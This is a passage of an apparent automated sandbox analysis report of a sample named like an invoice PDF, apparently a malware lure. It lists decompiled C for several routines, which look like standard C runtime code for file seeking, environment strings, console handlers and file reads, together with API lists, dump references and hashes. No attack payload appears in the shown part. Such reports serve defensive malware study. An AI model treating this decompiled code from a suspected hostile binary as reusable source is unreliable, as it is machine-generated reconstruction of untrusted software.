				signed int _t36;

				_t36 = _a4;
				_push(_t32);
				_t15 = E0131E926(_t36);
				_t33 = _t32 | 0xffffffff;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					if(_t16 != 0) {
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x30;
							 *( *((intOrPtr*)(0x1346108 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0x1346108 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
						}
					} else {
						E0131C998(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E0131C9CE())) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}











                            0x01322776
                            0x01322779
                            0x0132277b
                            0x01322780
                            0x01322786
                            0x01322799
                            0x013227a7
                            0x013227af
                            0x013227ca
                            0x00000000
                            0x013227cc
                            0x013227cc
                            0x013227d7
                            0x013227e1
                            0x013227e1
                            0x013227b1
                            0x013227b8
                            0x00000000
                            0x013227bd
                            0x01322788
                            0x0132278d
                            0x01322793
                            0x01322793
                            0x01322795
                            0x013227eb

                            APIs
                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,0132281D,?,00000000,00000002,00000000), ref: 013227A7
                            • GetLastError.KERNEL32(?,0132281D,?,00000000,00000002,00000000,?,01323143,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 013227B1
                            • __dosmaperr.LIBCMT ref: 013227B8
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID:
                            • API String ID: 2336955059-0
                            • Opcode ID: 02afdac78791472bed70760892371673686be6b007f06494764c2f287149006d
                            • Instruction ID: 5088f0b0bf909b83912d538d01cba551c42da1468600141f4c559c53e6c25e06
                            • Opcode Fuzzy Hash: 02afdac78791472bed70760892371673686be6b007f06494764c2f287149006d
                            • Instruction Fuzzy Hash: 3E01F037614519ABCF159F6DDC048AF7B1EDB85334F140255F8119B185EB71DD4187D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01327CE3, Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 100%
                            			E01327CE3(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E01327C29(_t19) - _t19 >> 1) + (E01327C29(_t19) - _t19 >> 1);
					_t6 = E01320A25(_t14, (E01327C29(_t19) - _t19 >> 1) + (E01327C29(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E013189A0(_t18, _t19, _t12);
					}
					E013209EB(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                            0x01327ce3
                            0x01327ced
                            0x01327cf1
                            0x01327d02
                            0x01327d06
                            0x01327d0b
                            0x01327d11
                            0x01327d16
                            0x01327d1b
                            0x01327d20
                            0x01327d27
                            0x01327cf3
                            0x01327cf3
                            0x01327cf3
                            0x01327d32

                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 01327CE7
                            • _free.LIBCMT ref: 01327D20
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01327D27
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: EnvironmentStrings$Free_free
                            • String ID:
                            • API String ID: 2716640707-0
                            • Opcode ID: e38150cedffa83540653268b21f5dd56ab4ee496d2931e04839aa9abb396bae7
                            • Instruction ID: 7ff5257842873359f69482adfc0badcc81f228ff35d7f2fb12ec8c50d2792b7a
                            • Opcode Fuzzy Hash: e38150cedffa83540653268b21f5dd56ab4ee496d2931e04839aa9abb396bae7
                            • Instruction Fuzzy Hash: 14E09B3B50453A6BE226363D7C48D7F3A1DEFD2979B650125F40497146EE208D0641F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131EDBE, Relevance: 3.1, APIs: 2, Instructions: 132COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 519 131edbe-131edd0 call 1318310 522 131ef61 519->522 523 131edd6-131edd9 519->523 525 131ef64-131ef69 call 131eb2a 522->525 523->522 524 131eddf-131ede5 523->524 527 131eea5-131eec0 call 1325ffe 524->527 528 131edeb-131edee 524->528 533 131ef6a-131ef6f call 1318356 525->533 537 131eec2-131eec5 527->537 538 131eec7-131eece 527->538 528->527 531 131edf4-131edf7 528->531 531->527 532 131edfd-131ee00 531->532 532->527 535 131ee06-131ee09 532->535 535->527 539 131ee0f-131ee12 535->539 537->538 541 131ef01-131ef0f call 131eac0 537->541 538->541 542 131eed0-131eedf SetConsoleCtrlHandler 538->542 543 131ee24-131ee2d call 13244a9 539->543 544 131ee14-131ee17 539->544 554 131ef11-131ef29 541->554 555 131ef37-131ef45 call 131ef58 541->555 546 131eee1-131eee8 542->546 547 131eeea-131eefe call 131c9bb GetLastError 542->547 553 131ee1e-131ee1f 543->553 558 131ee2f-131ee35 543->558 544->543 549 131ee19-131ee1c 544->549 546->541 547->541 549->543 549->553 553->525 554->555 557 131ef2b-131ef35 call 131f6ac 554->557 555->553 567 131ef4b-131ef4d 555->567 557->555 561 131ee37-131ee47 call 1320a25 558->561 562 131ee5d-131ee6d call 131eb02 558->562 561->553 571 131ee49-131ee5a call 13189a0 561->571 562->553 570 131ee6f-131ee7a 562->570 567->533 572 131ee7c-131ee88 570->572 573 131ee9e-131eea0 570->573 571->562 572->573 575 131ee8a-131ee8d 572->575 573->533 577 131ee9b 575->577 578 131ee8f-131ee99 575->578 577->573 578->575 578->577
                            C-Code - Quality: 87%
                            			E0131EDBE(signed int** __edx, void* __eflags) {
				signed int* _t26;
				int _t31;
				intOrPtr* _t32;
				void* _t36;
				intOrPtr _t38;
				signed int* _t40;
				int _t41;
				void* _t42;
				intOrPtr _t55;
				signed int _t57;
				intOrPtr* _t59;
				void* _t61;
				void* _t62;

				_t54 = __edx;
				E01318310(__edx, 0x133a620, 0x18);
				_t40 =  *(_t62 + 0xc);
				if(_t40 == 4 || _t40 == 3) {
					_push( *((intOrPtr*)(_t62 + 8)));
					goto L34;
				} else {
					_t55 =  *((intOrPtr*)(_t62 + 8));
					if(_t55 == 2 || _t55 == 0x15 || _t55 == 0x16 || _t55 == 6 || _t55 == 0xf) {
						_t41 = 0;
						 *((char*)(_t62 - 0x19)) = 0;
						 *(_t62 - 0x28) = 0;
						 *(_t62 - 0x20) = 0;
						E01325FFE(3);
						 *((intOrPtr*)(_t62 - 4)) = 0;
						if(_t55 == 2 || _t55 == 0x15) {
							if( *0x1345e90 == 0) {
								_t31 = SetConsoleCtrlHandler(E0131EA12, 1); // executed
								if(_t31 == 0) {
									_t32 = E0131C9BB();
									 *_t32 = GetLastError();
									_t41 = 1;
									 *((char*)(_t62 - 0x19)) = 1;
								} else {
									 *0x1345e90 = 1;
								}
							}
						}
						_t26 = E0131EAC0(_t55);
						 *(_t62 - 0x28) = _t26;
						if(_t26 != 0) {
							_t57 =  *0x133c008; // 0xa3433343
							asm("ror esi, cl");
							 *(_t62 - 0x20) = _t57 ^  *_t26;
							_t29 =  *(_t62 + 0xc);
							if( *(_t62 + 0xc) != 2) {
								 *( *(_t62 - 0x28)) = E0131F6AC(_t29);
							}
						}
						 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
						E0131EF58();
						if(_t41 != 0) {
							goto L10;
						} else {
							goto L35;
						}
					} else {
						if(_t55 == 8 || _t55 == 4 || _t55 == 0xb) {
							_t59 = E013244A9(_t42);
							if(_t59 == 0) {
								goto L10;
							}
							if( *_t59 != 0x1335190) {
								L15:
								 *((intOrPtr*)(_t62 - 0x24)) =  *_t59;
								_t36 = E0131EB02(_t55,  *_t59);
								if(_t36 == 0) {
									goto L10;
								}
								_t4 = _t36 + 8; // 0x8
								_t54 = _t4;
								 *(_t62 - 0x28) =  *_t54;
								if(_t40 == 2) {
									L21:
									goto L35;
								}
								_t61 =  *0x1335220 * 0xc +  *((intOrPtr*)(_t62 - 0x24));
								if(_t36 == _t61) {
									goto L21;
								}
								while( *((intOrPtr*)(_t54 - 4)) == _t55) {
									 *_t54 = _t40;
									_t54 =  &(_t54[3]);
									_t8 = _t54 - 8; // -12
									if(_t8 != _t61) {
										continue;
									}
									break;
								}
								goto L21;
							}
							_t38 = E01320A25(_t42,  *0x1335224);
							 *_t59 = _t38;
							if(_t38 == 0) {
								goto L10;
							} else {
								E013189A0(_t38, 0x1335190,  *0x1335224);
								goto L15;
							}
						} else {
							L10:
							_push(_t55);
							L34:
							E0131EB2A();
							L35:
							return E01318356(_t54);
						}
					}
				}
			}
















                            0x0131edbe
                            0x0131edc5
                            0x0131edca
                            0x0131edd0
                            0x0131ef61
                            0x00000000
                            0x0131eddf
                            0x0131eddf
                            0x0131ede5
                            0x0131eea5
                            0x0131eea7
                            0x0131eeac
                            0x0131eeaf
                            0x0131eeb4
                            0x0131eeba
                            0x0131eec0
                            0x0131eece
                            0x0131eed7
                            0x0131eedf
                            0x0131eeea
                            0x0131eef7
                            0x0131eef9
                            0x0131eefb
                            0x0131eee1
                            0x0131eee1
                            0x0131eee1
                            0x0131eedf
                            0x0131eece
                            0x0131ef02
                            0x0131ef0a
                            0x0131ef0f
                            0x0131ef11
                            0x0131ef1e
                            0x0131ef20
                            0x0131ef23
                            0x0131ef29
                            0x0131ef35
                            0x0131ef35
                            0x0131ef29
                            0x0131ef37
                            0x0131ef3e
                            0x0131ef45
                            0x00000000
                            0x0131ef4b
                            0x00000000
                            0x0131ef4b
                            0x0131ee0f
                            0x0131ee12
                            0x0131ee29
                            0x0131ee2d
                            0x00000000
                            0x00000000
                            0x0131ee35
                            0x0131ee5d
                            0x0131ee5f
                            0x0131ee64
                            0x0131ee6d
                            0x00000000
                            0x00000000
                            0x0131ee6f
                            0x0131ee6f
                            0x0131ee74
                            0x0131ee7a
                            0x0131ee9e
                            0x00000000
                            0x0131ee9e
                            0x0131ee83
                            0x0131ee88
                            0x00000000
                            0x00000000
                            0x0131ee8a
                            0x0131ee8f
                            0x0131ee91
                            0x0131ee94
                            0x0131ee99
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131ee99
                            0x00000000
                            0x0131ee9b
                            0x0131ee3d
                            0x0131ee43
                            0x0131ee47
                            0x00000000
                            0x0131ee49
                            0x0131ee55
                            0x00000000
                            0x0131ee5a
                            0x0131ee1e
                            0x0131ee1e
                            0x0131ee1e
                            0x0131ef64
                            0x0131ef64
                            0x0131ef6a
                            0x0131ef6f
                            0x0131ef6f
                            0x0131ee12
                            0x0131ede5

                            APIs
                            • SetConsoleCtrlHandler.KERNELBASE(0131EA12,00000001,0133A620,00000018,01314440,00000016,00000001,?,?,00001000,013126B4,?,00000000), ref: 0131EED7
                            • GetLastError.KERNEL32 ref: 0131EEF1
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ConsoleCtrlErrorHandlerLast
                            • String ID:
                            • API String ID: 3113525192-0
                            • Opcode ID: 5e423a2994a1a0e0352fdb575c735f3d4f73d8aad7e1cb9feaa8c1fcc4aa4a6f
                            • Instruction ID: bfc555b1300799d4f1d7580ae18195f6067850595f3154fbb11db63bd75c0074
                            • Opcode Fuzzy Hash: 5e423a2994a1a0e0352fdb575c735f3d4f73d8aad7e1cb9feaa8c1fcc4aa4a6f
                            • Instruction Fuzzy Hash: E841E531E002168BEF3F9F6CC4845ADBBB6AF59318F190039ED49A7258D7339884C765
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131CA68, Relevance: 3.1, APIs: 2, Instructions: 101COMMON
                            Download Yara Rule
                            C-Code - Quality: 62%
                            			E0131CA68(WCHAR* _a4, void* _a8) {
				void* _v8;
				void _v56;
				void* __edi;
				signed int _t17;
				void* _t18;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t34;
				signed int _t36;
				void* _t39;
				signed int _t42;
				signed int _t44;
				void* _t45;
				WCHAR* _t49;
				void* _t56;
				intOrPtr _t59;
				void* _t60;
				void* _t62;

				if(_a8 != 0) {
					_push(_t45);
					_t34 = 0;
					E01318520(_t45,  &_v56, 0, 0x30);
					_t36 = 0xc;
					memcpy(_a8,  &_v56, _t36 << 2);
					_t62 = _t60 + 0x18;
					_t49 = _a4;
					__eflags = _t49;
					if(_t49 != 0) {
						_t17 = E01325190(_t49, L"?*");
						_pop(_t39);
						__eflags = _t17;
						if(_t17 == 0) {
							_t18 = CreateFileW(_t49, 0x80, 7, 0, 3, 0x2000000, 0); // executed
							_push(_a8);
							_t56 = _t18;
							_v8 = _t56;
							__eflags = _t56 - 0xffffffff;
							if(__eflags == 0) {
								_push(_t49);
								_t19 = E0131CB6F(_t39, _t44, _t49, __eflags);
							} else {
								_push(_t56);
								_push(0xffffffff);
								_push(_t49);
								_t19 = E0131CBFB(_t44);
								_t62 = _t62 + 0x10;
							}
							__eflags = _t19;
							if(_t19 == 0) {
								E01318520(_t49,  &_v56, _t34, 0x30);
								_t34 = _t34 | 0xffffffff;
								__eflags = _t34;
								_t42 = 0xc;
								memcpy(_a8,  &_v56, _t42 << 2);
								_t56 = _v8;
							}
							__eflags = _t56 - 0xffffffff;
							if(_t56 != 0xffffffff) {
								CloseHandle(_t56);
							}
							_t20 = _t34;
							L15:
							return _t20;
						}
						_t25 = E0131C9CE();
						_t59 = 2;
						 *_t25 = _t59;
						_t26 = E0131C9BB();
						 *_t26 = _t59;
						L6:
						_t20 = _t26 | 0xffffffff;
						goto L15;
					}
					 *(E0131C9BB()) = 0;
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					_t26 = E01321788();
					goto L6;
				}
				 *(E0131C9BB()) =  *_t29 & 0x00000000;
				 *((intOrPtr*)(E0131C9CE())) = 0x16;
				return E01321788() | 0xffffffff;
			}























                            0x0131ca74
                            0x0131ca98
                            0x0131ca9b
                            0x0131caa2
                            0x0131cab2
                            0x0131cab3
                            0x0131cab3
                            0x0131cab5
                            0x0131cab8
                            0x0131caba
                            0x0131cadb
                            0x0131cae1
                            0x0131cae2
                            0x0131cae4
                            0x0131cb0d
                            0x0131cb13
                            0x0131cb16
                            0x0131cb18
                            0x0131cb1b
                            0x0131cb1e
                            0x0131cb2e
                            0x0131cb2f
                            0x0131cb20
                            0x0131cb20
                            0x0131cb21
                            0x0131cb23
                            0x0131cb24
                            0x0131cb29
                            0x0131cb29
                            0x0131cb36
                            0x0131cb38
                            0x0131cb41
                            0x0131cb4f
                            0x0131cb4f
                            0x0131cb54
                            0x0131cb55
                            0x0131cb57
                            0x0131cb57
                            0x0131cb5a
                            0x0131cb5d
                            0x0131cb60
                            0x0131cb60
                            0x0131cb66
                            0x0131cb68
                            0x00000000
                            0x0131cb6a
                            0x0131cae6
                            0x0131caed
                            0x0131caee
                            0x0131caf0
                            0x0131caf5
                            0x0131caf7
                            0x0131caf7
                            0x00000000
                            0x0131caf7
                            0x0131cac1
                            0x0131cac8
                            0x0131cace
                            0x00000000
                            0x0131cace
                            0x0131ca7b
                            0x0131ca83
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b3d22fc2818e1b9c7d8198c823d1ea9e7bcc9a25d3c53b52a694d48b765a87d
                            • Instruction ID: 4e60c5844f1bc9349a7417f8750659f42c954b4913d449276790f675b670589d
                            • Opcode Fuzzy Hash: 0b3d22fc2818e1b9c7d8198c823d1ea9e7bcc9a25d3c53b52a694d48b765a87d
                            • Instruction Fuzzy Hash: 4331FB72880219BAEB297B6CDC41FAE372DEF4273CF105215F9646B1C4DB705D01D6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013113D0, Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E013113D0(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				void* _v8;
				char _v92;
				void* _v100;
				char _v104;
				signed int _t12;
				signed int _t14;
				void* _t17;
				void* _t21;
				intOrPtr* _t31;
				char* _t35;
				signed int _t42;
				void* _t43;

				_t42 =  &_v100;
				_t12 =  *0x133c008; // 0xa3433343
				_v4 = _t12 ^ _t42;
				_t31 = _a4;
				_t35 =  &_v92;
				_t21 = _a8 + 0xffffffa0;
				_t14 = E01319F16(__edx,  *_t31, _t21, 0); // executed
				_t43 = _t42 + 0xc;
				if(_t14 != 0) {
					L5:
					E0131786A();
					return _t14 | 0xffffffff;
				} else {
					_t14 = E01319B2B( &_v100, 0x60, 1,  *_t31); // executed
					_t43 = _t43 + 0x10;
					if(_t14 < 1) {
						goto L5;
					} else {
						while(1) {
							_t17 = E01319780(0x1330340, _t35, 8);
							_t43 = _t43 + 0xc;
							if(_t17 == 0) {
								break;
							}
							_t35 = _t35 - 1;
							_t14 =  &_v100;
							if(_t35 >= _t14) {
								continue;
							} else {
								goto L5;
							}
							goto L7;
						}
						asm("movups xmm0, [esi]");
						asm("movups [edi+0x10], xmm0");
						asm("movups xmm0, [esi+0x10]");
						asm("movups [edi+0x20], xmm0");
						asm("movups xmm0, [esi+0x20]");
						asm("movups [edi+0x30], xmm0");
						asm("movups xmm0, [esi+0x30]");
						asm("movups [edi+0x40], xmm0");
						asm("movups xmm0, [esi+0x40]");
						asm("movups [edi+0x50], xmm0");
						asm("movq xmm0, [esi+0x50]");
						asm("movq [edi+0x60], xmm0");
						_push( *((intOrPtr*)(_t31 + 0x18)));
						L01317864();
						 *((intOrPtr*)(_t31 + 4)) = _t35 -  &_v104 + _t21 - _t17 + 0x58;
						E0131786A();
						return 0;
					}
				}
				L7:
			}
















                            0x013113d0
                            0x013113d3
                            0x013113da
                            0x013113e5
                            0x013113e9
                            0x013113ef
                            0x013113f5
                            0x013113fa
                            0x013113ff
                            0x0131143d
                            0x01311449
                            0x01311451
                            0x01311401
                            0x0131140c
                            0x01311411
                            0x01311417
                            0x00000000
                            0x01311420
                            0x01311420
                            0x01311428
                            0x0131142d
                            0x01311432
                            0x00000000
                            0x00000000
                            0x01311434
                            0x01311435
                            0x0131143b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131143b
                            0x01311452
                            0x01311455
                            0x01311459
                            0x0131145d
                            0x01311461
                            0x01311465
                            0x01311469
                            0x0131146d
                            0x01311471
                            0x01311475
                            0x01311479
                            0x0131147e
                            0x01311483
                            0x01311486
                            0x0131149e
                            0x013114a6
                            0x013114ae
                            0x013114ae
                            0x01311417
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __fread_nolockhtonl
                            • String ID:
                            • API String ID: 822407656-0
                            • Opcode ID: 012f51b5b7b31a088673919ea0ca95313ad4acad09730e1f68a6e2fa3f4b8288
                            • Instruction ID: 556056ec954d51a1965f5073cb3e38887b137cc2307528d74eb4faed9977456f
                            • Opcode Fuzzy Hash: 012f51b5b7b31a088673919ea0ca95313ad4acad09730e1f68a6e2fa3f4b8288
                            • Instruction Fuzzy Hash: CF212632E04B42A7D3249B3CCC016A6F3A0FFA8218F849B19FE9862545FB21F5D4C381
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01319FC9, Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E01319FC9(signed int __edx, intOrPtr* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t64;
				signed int _t66;
				signed char _t68;
				signed int _t70;
				signed char _t77;
				intOrPtr* _t78;
				signed int _t79;
				signed char _t80;
				intOrPtr _t82;
				intOrPtr _t83;
				signed int _t90;
				intOrPtr _t93;
				signed int _t94;
				intOrPtr* _t95;
				signed char _t96;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed int _t120;

				_t104 = __edx;
				if(_a4 != 0) {
					_t64 = E013209C5(_a4);
					_t93 = _a4;
					_t118 = _t64;
					__eflags =  *(_t93 + 8);
					if( *(_t93 + 8) < 0) {
						 *(_t93 + 8) = 0;
					}
					_t66 = E013227EC(_t118, 0, 0, 1); // executed
					_t90 = _t104;
					_t109 = _t66;
					_v12 = _t109;
					__eflags = _t90;
					if(__eflags > 0) {
						L7:
						_t68 =  *(_a4 + 0xc);
						__eflags = _t68 & 0x000000c0;
						if((_t68 & 0x000000c0) != 0) {
							_t70 = _t118 >> 6;
							_t94 = (_t118 & 0x0000003f) * 0x30;
							_v16 = _t70;
							_v20 = _t94;
							_t95 = _a4;
							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0x1346108 + _t70 * 4)) + 0x29));
							_t96 =  *(_t95 + 0xc);
							asm("cdq");
							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
							__eflags = _t96 & 0x00000003;
							if((_t96 & 0x00000003) == 0) {
								_t77 =  *(_a4 + 0xc) >> 2;
								__eflags = _t77 & 0x00000001;
								if((_t77 & 0x00000001) != 0) {
									L23:
									_t78 = _a4;
									L24:
									__eflags = _t109 | _t90;
									if((_t109 | _t90) == 0) {
										L30:
										_t79 = _t120;
										goto L31;
									}
									_t80 =  *(_t78 + 0xc);
									__eflags = _t80 & 0x00000001;
									if((_t80 & 0x00000001) == 0) {
										__eflags = _v5 - 1;
										if(_v5 == 1) {
											_t120 = E01317AE0(_t120, _t104, 2, 0);
										}
										_t120 = _t120 + _t109;
										asm("adc edx, ebx");
										goto L30;
									}
									_t79 = E0131A15E(_a4, _t109, _t90, _t120, _t104);
									goto L31;
								}
								_t66 = E0131C9CE();
								 *_t66 = 0x16;
								goto L22;
							}
							__eflags = _v5 - 1;
							_t99 = _v16;
							if(_v5 != 1) {
								L13:
								_t82 =  *((intOrPtr*)(0x1346108 + _t99 * 4));
								_t100 = _v20;
								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
									goto L23;
								}
								_t78 = _a4;
								_v20 = _v20 & 0x00000000;
								_t111 =  *(_t78 + 4);
								__eflags =  *_t78 - _t111;
								asm("sbb edi, edi");
								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
								__eflags = _t113;
								_v16 = _t113;
								_t109 = _v12;
								if(_t113 == 0) {
									goto L24;
								}
								_t103 =  *(_t78 + 4);
								_t114 = _v20;
								do {
									__eflags =  *_t103 - 0xa;
									if( *_t103 == 0xa) {
										_t120 = _t120 + 1;
										asm("adc edx, 0x0");
									}
									_t103 = _t103 + 1;
									_t114 = _t114 + 1;
									__eflags = _t114 - _v16;
								} while (_t114 != _v16);
								_t109 = _v12;
								goto L24;
							}
							_t115 = _v20;
							_t83 =  *((intOrPtr*)(0x1346108 + _t99 * 4));
							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
							_t109 = _v12;
							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t79 = E0131A2E2(_a4, _t109, _t90);
							goto L31;
						}
						asm("cdq");
						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ebx, edx");
						goto L31;
					} else {
						if(__eflags < 0) {
							L22:
							_t79 = _t66 | 0xffffffff;
							L31:
							return _t79;
						}
						__eflags = _t109;
						if(_t109 < 0) {
							goto L22;
						}
						goto L7;
					}
				}
				 *((intOrPtr*)(E0131C9CE())) = 0x16;
				return E01321788() | 0xffffffff;
			}
































                            0x01319fc9
                            0x01319fd5
                            0x01319ff5
                            0x01319ffb
                            0x01319ffe
                            0x0131a002
                            0x0131a005
                            0x0131a007
                            0x0131a007
                            0x0131a011
                            0x0131a016
                            0x0131a01b
                            0x0131a01d
                            0x0131a020
                            0x0131a022
                            0x0131a032
                            0x0131a035
                            0x0131a038
                            0x0131a03a
                            0x0131a055
                            0x0131a058
                            0x0131a05b
                            0x0131a065
                            0x0131a06c
                            0x0131a06f
                            0x0131a077
                            0x0131a07a
                            0x0131a07b
                            0x0131a07d
                            0x0131a080
                            0x0131a104
                            0x0131a107
                            0x0131a109
                            0x0131a11d
                            0x0131a11d
                            0x0131a120
                            0x0131a122
                            0x0131a124
                            0x0131a155
                            0x0131a155
                            0x00000000
                            0x0131a155
                            0x0131a126
                            0x0131a129
                            0x0131a12b
                            0x0131a13e
                            0x0131a142
                            0x0131a14f
                            0x0131a14f
                            0x0131a151
                            0x0131a153
                            0x00000000
                            0x0131a153
                            0x0131a134
                            0x00000000
                            0x0131a139
                            0x0131a10b
                            0x0131a110
                            0x00000000
                            0x0131a110
                            0x0131a082
                            0x0131a086
                            0x0131a089
                            0x0131a0b1
                            0x0131a0b1
                            0x0131a0b8
                            0x0131a0bb
                            0x0131a0c0
                            0x00000000
                            0x00000000
                            0x0131a0c2
                            0x0131a0c5
                            0x0131a0ce
                            0x0131a0d1
                            0x0131a0d3
                            0x0131a0d7
                            0x0131a0d7
                            0x0131a0d9
                            0x0131a0dc
                            0x0131a0df
                            0x00000000
                            0x00000000
                            0x0131a0e1
                            0x0131a0e4
                            0x0131a0e7
                            0x0131a0e7
                            0x0131a0ea
                            0x0131a0ec
                            0x0131a0ef
                            0x0131a0ef
                            0x0131a0f2
                            0x0131a0f3
                            0x0131a0f4
                            0x0131a0f4
                            0x0131a0f9
                            0x00000000
                            0x0131a0f9
                            0x0131a08b
                            0x0131a08e
                            0x0131a095
                            0x0131a09a
                            0x0131a09d
                            0x00000000
                            0x00000000
                            0x0131a0a4
                            0x00000000
                            0x0131a0a9
                            0x0131a042
                            0x0131a045
                            0x0131a047
                            0x00000000
                            0x0131a024
                            0x0131a024
                            0x0131a116
                            0x0131a116
                            0x0131a157
                            0x00000000
                            0x0131a159
                            0x0131a02a
                            0x0131a02c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131a02c
                            0x0131a022
                            0x01319fdc
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
